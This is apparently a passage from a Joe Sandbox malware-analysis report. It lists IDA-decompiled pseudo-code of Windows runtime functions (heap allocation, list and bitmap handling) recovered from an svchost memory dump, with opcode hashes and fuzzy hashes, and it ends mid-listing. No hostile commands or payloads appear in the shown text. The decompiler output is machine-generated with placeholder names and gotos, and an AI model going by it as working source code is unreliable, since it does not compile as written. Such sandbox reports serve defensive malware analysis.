				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3b00220);
				E03A7D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3b17b9c; // 0x0
				_t55 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E03A7D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3b17b10 =  *0x3b17b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x3b1536c; // 0x77995368
					if( *_t51 != 0x3b15368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3b15368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x3b1536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E03A5A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                          0x03a5a61c
                                          0x03a5a61e
                                          0x03a5a623
                                          0x03a5a628
                                          0x03a5a62b
                                          0x03a5a62d
                                          0x03a5a648
                                          0x03a5a64a
                                          0x03a5a64f
                                          0x03a99b44
                                          0x03a5a6ec
                                          0x03a5a6f1
                                          0x03a5a6f1
                                          0x03a5a655
                                          0x03a5a657
                                          0x03a5a65a
                                          0x03a5a65d
                                          0x03a5a662
                                          0x03a5a663
                                          0x03a5a667
                                          0x03a5a668
                                          0x03a5a66d
                                          0x03a5a706
                                          0x03a5a706
                                          0x03a99bda
                                          0x03a99be6
                                          0x03a99beb
                                          0x00000000
                                          0x03a99beb
                                          0x03a5a679
                                          0x03a99b7a
                                          0x00000000
                                          0x03a99b7a
                                          0x03a5a683
                                          0x03a5a6f4
                                          0x03a5a6f7
                                          0x03a5a6f9
                                          0x03a5a6fd
                                          0x03a5a6a0
                                          0x03a5a6a0
                                          0x03a5a6ad
                                          0x03a5a6af
                                          0x03a5a6b4
                                          0x03a99ba7
                                          0x03a99bac
                                          0x00000000
                                          0x00000000
                                          0x03a99bc6
                                          0x03a99bce
                                          0x03a99bd1
                                          0x03a99bd3
                                          0x03a99bd3
                                          0x00000000
                                          0x03a99bd1
                                          0x03a5a6bd
                                          0x03a5a6c3
                                          0x03a5a6c6
                                          0x03a5a6d2
                                          0x03a5a701
                                          0x03a5a704
                                          0x00000000
                                          0x03a5a704
                                          0x03a5a6d4
                                          0x03a5a6d6
                                          0x03a5a6d9
                                          0x03a5a6db
                                          0x03a5a6e1
                                          0x03a5a6e6
                                          0x03a5a6e8
                                          0x03a5a6e8
                                          0x03a5a6ea
                                          0x00000000
                                          0x03a5a6ea
                                          0x03a5a688
                                          0x03a5a692
                                          0x03a5a694
                                          0x03a5a699
                                          0x00000000
                                          0x00000000
                                          0x03a5a69d
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5433ea55986fbab4c80a3d2589da43abebd6023b707a2d61a0620b4cddaf2313
                                          • Instruction ID: c9caf325393d662c8e8ab88006311557cfbcfa907f5e7f5ce246008dca17a7c2
                                          • Opcode Fuzzy Hash: 5433ea55986fbab4c80a3d2589da43abebd6023b707a2d61a0620b4cddaf2313
                                          • Instruction Fuzzy Hash: FA4168B5B01205EFCB15CF58D990B9ABBF1BB89304F1881AEE805AF744C778A901CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A63D43 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E03A63D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03A37B60(0, _t61, 0x3a011c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03A37B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03A44620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                          0x03a63d4c
                                          0x03a63d50
                                          0x03a63d55
                                          0x03a63d5e
                                          0x03a9e79a
                                          0x00000000
                                          0x03a9e79a
                                          0x03a63d68
                                          0x03a9e789
                                          0x03a63d9d
                                          0x03a63da3
                                          0x03a63daf
                                          0x03a63db5
                                          0x03a63dbc
                                          0x03a63dc4
                                          0x03a63dc9
                                          0x03a63dce
                                          0x03a9e7ae
                                          0x03a9e7ae
                                          0x03a63dde
                                          0x03a63de2
                                          0x03a63de7
                                          0x03a63e0d
                                          0x03a63e13
                                          0x03a63e16
                                          0x03a63e1e
                                          0x03a63e25
                                          0x03a63e28
                                          0x00000000
                                          0x00000000
                                          0x03a63e2a
                                          0x03a63e2f
                                          0x03a63e37
                                          0x03a63e37
                                          0x00000000
                                          0x03a63e37
                                          0x03a63e31
                                          0x00000000
                                          0x03a63e31
                                          0x03a63e20
                                          0x03a63e20
                                          0x03a63e35
                                          0x00000000
                                          0x03a63de9
                                          0x03a63de9
                                          0x03a63de9
                                          0x03a63dee
                                          0x03a63dfd
                                          0x03a63dff
                                          0x03a63e02
                                          0x03a63e05
                                          0x03a63e05
                                          0x00000000
                                          0x03a63df0
                                          0x03a63de7
                                          0x03a9e78f
                                          0x03a9e794
                                          0x03a63d79
                                          0x03a63d84
                                          0x03a63d89
                                          0x03a63d8e
                                          0x00000000
                                          0x03a9e7a4
                                          0x03a63d96
                                          0x03a63d9a
                                          0x00000000
                                          0x03a63d9a
                                          0x00000000
                                          0x03a9e794
                                          0x03a63d6e
                                          0x03a63d73
                                          0x00000000
                                          0x03a9e7b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4efe2daad21bd2a1fe64cb2446017a72ac91eeb91d7087bb2842c9d2f0ea7fb9
                                          • Instruction ID: 9c42f2aa86114067562b53bb9f27d496b07f8316519204d6484f1a346f62ecbf
                                          • Opcode Fuzzy Hash: 4efe2daad21bd2a1fe64cb2446017a72ac91eeb91d7087bb2842c9d2f0ea7fb9
                                          • Instruction Fuzzy Hash: 1131B039600614DBDB24CF29C841A7EBBF5EF4570070985AFE845DB3A1E730D842C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A4C182 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E03A4C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03A47D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E03AF8D34(_v8, _t80);
					}
					E03A42280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E03A3FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E03AF8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E03A3FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E03A6B180();
						if(_a4 != 0) {
							E03A42280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E03A4BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E03A4BB2D(_t16, _t15);
						E03A4B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E03A3FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E03A3FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E03A3FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                          0x03a4c18d
                                          0x03a4c18f
                                          0x03a4c191
                                          0x03a4c19b
                                          0x03a4c1a0
                                          0x03a4c1d4
                                          0x03a4c1de
                                          0x03a92d6e
                                          0x03a4c1e4
                                          0x03a4c1e4
                                          0x03a4c1e4
                                          0x03a4c1ec
                                          0x03a92d7d
                                          0x03a92d7d
                                          0x03a4c1f3
                                          0x03a4c1ff
                                          0x03a92d88
                                          0x03a92d8d
                                          0x03a92d94
                                          0x03a92d94
                                          0x03a92d9f
                                          0x03a92da4
                                          0x03a92dab
                                          0x03a92db0
                                          0x03a92db2
                                          0x03a92db3
                                          0x03a92db4
                                          0x03a92dbc
                                          0x03a92dc3
                                          0x03a92dc3
                                          0x03a4c205
                                          0x03a4c205
                                          0x03a4c208
                                          0x03a4c20e
                                          0x03a4c211
                                          0x03a4c216
                                          0x03a4c219
                                          0x03a4c21f
                                          0x03a4c222
                                          0x03a4c22c
                                          0x03a4c234
                                          0x03a4c23a
                                          0x03a4c23f
                                          0x03a4c245
                                          0x03a4c24b
                                          0x03a4c251
                                          0x03a4c25a
                                          0x03a4c276
                                          0x03a4c27d
                                          0x03a4c27d
                                          0x03a4c25c
                                          0x03a4c25c
                                          0x00000000
                                          0x03a4c25e
                                          0x03a4c1a4
                                          0x03a4c1aa
                                          0x03a4c1b3
                                          0x03a4c265
                                          0x03a4c26c
                                          0x03a4c26c
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 022acf20bc45a9683be9abd12916d68258fcf18771cea4d73c964b5d0fdfbfbe
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: 8E312B75A0664ABFDB08EBB4C580BE9F768BF82214F08415BD41C5B301DB345A45D7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AA7016 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E03AA7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x3b1d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E03AA6B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E03AA6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E03A47D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E03A69AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E03A6B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L03A44620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                          0x03aa7016
                                          0x03aa701e
                                          0x03aa702b
                                          0x03aa7033
                                          0x03aa7037
                                          0x03aa703c
                                          0x03aa703e
                                          0x03aa7041
                                          0x03aa7045
                                          0x03aa704a
                                          0x03aa7050
                                          0x03aa7055
                                          0x03aa705a
                                          0x03aa7062
                                          0x03aa7062
                                          0x03aa705a
                                          0x03aa7064
                                          0x03aa7064
                                          0x03aa7067
                                          0x03aa7071
                                          0x03aa7096
                                          0x03aa709b
                                          0x03aa70a2
                                          0x03aa70a6
                                          0x03aa70a7
                                          0x03aa70ad
                                          0x03aa70b3
                                          0x03aa70b6
                                          0x03aa70bb
                                          0x03aa70c3
                                          0x03aa70c3
                                          0x03aa70c6
                                          0x03aa70cd
                                          0x03aa70dd
                                          0x03aa70e0
                                          0x03aa70e2
                                          0x03aa70e2
                                          0x03aa70ee
                                          0x03aa7101
                                          0x03aa70f0
                                          0x03aa70f9
                                          0x03aa70f9
                                          0x03aa710a
                                          0x03aa710e
                                          0x03aa7112
                                          0x03aa7117
                                          0x03aa7118
                                          0x03aa7118
                                          0x03aa70bb
                                          0x03aa711d
                                          0x03aa7123
                                          0x03aa7131
                                          0x03aa7131
                                          0x03aa7136
                                          0x03aa713d
                                          0x03aa713e
                                          0x03aa713f
                                          0x03aa714a
                                          0x03aa714a
                                          0x03aa7084
                                          0x03aa7088
                                          0x00000000
                                          0x03aa708e
                                          0x03aa708e
                                          0x03aa7092
                                          0x00000000
                                          0x03aa7092

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7357e7a94b441e2dd79ec2436e51090ca2fe37300025c3a645fcb7ccbc10ebc1
                                          • Instruction ID: d489c671da33e2114358b0009f5354ea2382a3ec67f6dcbf23fcef8c1b1521a8
                                          • Opcode Fuzzy Hash: 7357e7a94b441e2dd79ec2436e51090ca2fe37300025c3a645fcb7ccbc10ebc1
                                          • Instruction Fuzzy Hash: 4A317376604B519BC321DF68C950A6BB7E5BFC8600F084A2EF8959B790E731E904CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03AD3D40 Relevance: .1, Instructions: 98COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E03AD3D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x3b1d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E03A42280(_t34, 0x3b18a6c);
				_t64 =  *0x3b15768; // 0x77995768
				if(_t64 != 0x3b15768) {
					while(1) {
						_t8 = _t64 + 8; // 0x77995770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E03A3FFB0(_t53, _t64, 0x3b18a6c);
						 *0x3b1b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E03A42280(_t45, 0x3b18a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x3b15768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E03A3FFB0(_t51, _t64, 0x3b18a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E03A6B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                          0x03ad3d40
                                          0x03ad3d48
                                          0x03ad3d52
                                          0x03ad3d59
                                          0x03ad3d5d
                                          0x03ad3d61
                                          0x03ad3d63
                                          0x03ad3d67
                                          0x03ad3d69
                                          0x03ad3d72
                                          0x03ad3d76
                                          0x03ad3d7a
                                          0x03ad3d7f
                                          0x03ad3d8b
                                          0x03ad3d91
                                          0x03ad3d91
                                          0x03ad3d91
                                          0x03ad3d94
                                          0x03ad3d96
                                          0x03ad3d9d
                                          0x03ad3da1
                                          0x03ad3db0
                                          0x03ad3dba
                                          0x03ad3dbc
                                          0x03ad3dbc
                                          0x03ad3dc6
                                          0x03ad3dcb
                                          0x03ad3dcf
                                          0x03ad3dd1
                                          0x03ad3dd4
                                          0x00000000
                                          0x00000000
                                          0x03ad3dd9
                                          0x03ad3e0c
                                          0x03ad3e0c
                                          0x03ad3e0f
                                          0x03ad3ddb
                                          0x03ad3ddb
                                          0x03ad3de0
                                          0x00000000
                                          0x03ad3de2
                                          0x03ad3de2
                                          0x03ad3de4
                                          0x03ad3de8
                                          0x03ad3deb
                                          0x03ad3df1
                                          0x00000000
                                          0x03ad3df3
                                          0x03ad3df3
                                          0x03ad3df5
                                          0x03ad3df8
                                          0x03ad3dfa
                                          0x00000000
                                          0x03ad3dfa
                                          0x03ad3df1
                                          0x03ad3de0
                                          0x03ad3e11
                                          0x03ad3e11
                                          0x00000000
                                          0x03ad3dfe
                                          0x03ad3e04
                                          0x03ad3e06
                                          0x00000000
                                          0x03ad3e06
                                          0x00000000
                                          0x03ad3e04
                                          0x03ad3d91
                                          0x03ad3e15
                                          0x03ad3e1a
                                          0x03ad3e1f
                                          0x03ad3e1f
                                          0x03ad3e23
                                          0x03ad3e29
                                          0x00000000
                                          0x00000000
                                          0x03ad3e2e
                                          0x00000000
                                          0x03ad3e30
                                          0x03ad3e30
                                          0x03ad3e35
                                          0x00000000
                                          0x03ad3e37
                                          0x03ad3e3e
                                          0x03ad3e42
                                          0x03ad3e48
                                          0x03ad3e4e
                                          0x00000000
                                          0x03ad3e4e
                                          0x03ad3e35
                                          0x00000000
                                          0x03ad3e2e
                                          0x03ad3e5b
                                          0x03ad3e5c
                                          0x03ad3e5d
                                          0x03ad3e68
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d09b6ba6b516b36329efbf66709470a0d7b9ae20036696621c4498ca72b0a5f
                                          • Instruction ID: 98524ec408bfaee4488b4827b9a933b2812f56d29aae1df64cb163f6ad1398a2
                                          • Opcode Fuzzy Hash: 6d09b6ba6b516b36329efbf66709470a0d7b9ae20036696621c4498ca72b0a5f
                                          • Instruction Fuzzy Hash: 65317A7A909302CFCB14DF14D58051ABBE5FF85604F4849AFF4999B291D730DD14CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A5A70E Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E03A5A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x3b17b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x3b17b10 = 8;
					 *0x3b17b14 = 0x3b17b0c;
					 *0x3b17b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E03A5A990(0x3b17b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L03A5A840(__edx, __ecx, __ecx, _t52, 0x3b17b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x3b17b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x3b17b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x3b17b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L03A44620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x3b17b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E03A6F3E0(_t50,  *0x3b17b14, _t8 >> 3);
						_t28 =  *0x3b17b14; // 0x0
						__eflags = _t28 - 0x3b17b0c;
						if(_t28 != 0x3b17b0c) {
							L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x3b17b14 = _t50;
						_t48 = _v12;
						 *0x3b17b10 = _t9;
						goto L6;
					}
					 *0x3b17b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                          0x03a5a713
                                          0x03a5a714
                                          0x03a5a717
                                          0x03a5a71d
                                          0x03a5a720
                                          0x03a5a722
                                          0x03a5a727
                                          0x03a5a74a
                                          0x03a5a754
                                          0x03a5a75e
                                          0x03a5a768
                                          0x03a5a76a
                                          0x03a5a773
                                          0x03a5a78b
